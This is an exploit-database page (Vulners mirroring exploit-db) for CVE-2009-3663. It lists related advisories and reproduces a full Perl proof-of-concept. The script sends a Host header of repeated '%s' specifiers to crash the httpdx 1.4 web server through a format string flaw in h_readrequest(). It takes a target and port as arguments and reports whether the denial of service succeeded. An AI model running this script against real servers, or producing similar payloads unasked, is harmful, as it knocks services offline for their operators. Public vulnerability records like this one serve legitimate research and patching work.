Lucene search
+L

httpdx 1.4 - HTTP Server Host Header Remote Format String Denial of Service

🗓️ 14 Sep 2009 00:00:00Reported by Pankaj KohliType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 40 Views

httpdx 1.4 format string denial of service through Host heade

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-3663
14 Sep 200900:00
circl
cve
CVE
CVE-2009-3663
11 Oct 200922:00
cve
cvelist
Cvelist
CVE-2009-3663
11 Oct 200922:00
cvelist
nvd
NVD
CVE-2009-3663
11 Oct 200922:30
nvd
openvas
OpenVAS
httpdx 'h_readrequest()' Host Header Format String Vulnerability
23 Oct 200900:00
openvas
openvas
OpenVAS
httpdx 'h_readrequest()' Host Header Format String Vulnerability
23 Oct 200900:00
openvas
prion
Prion
Format string
11 Oct 200922:30
prion
# httpdx Web Server 1.4 'Host Header' Remote Format String Denial of Service PoC
#
# Coded by Pankaj Kohli
# http://www.pank4j.com
#
# httpdx web server 1.4 is vulnerable to a remote format string vulnerability through the Host header.
# The vulnerability lies in httpd_src/http.cpp in h_readrequest() : snprintf(temp[1],MAX,client->host);
#

use LWP;

(($target = $ARGV[0]) && ($port = $ARGV[1])) || die "Usage: $0 <target> <port> \n";

my $ua = new LWP::UserAgent;
print "Connecting to $target on port $port\n";
my $request = new HTTP::Request('GET', "http://" . $target . ":" . $port);
print "Sending evil header \n";
my $host_header =  "%s"x32;
$request->header('Host', $host_header); my $response = $ua->request($request);

if ($response->is_success) { print "DoS Failed \n" }
else { print "DoS Successful \n" }

# milw0rm.com [2009-09-14]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Sep 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 210
EPSS0.14632
40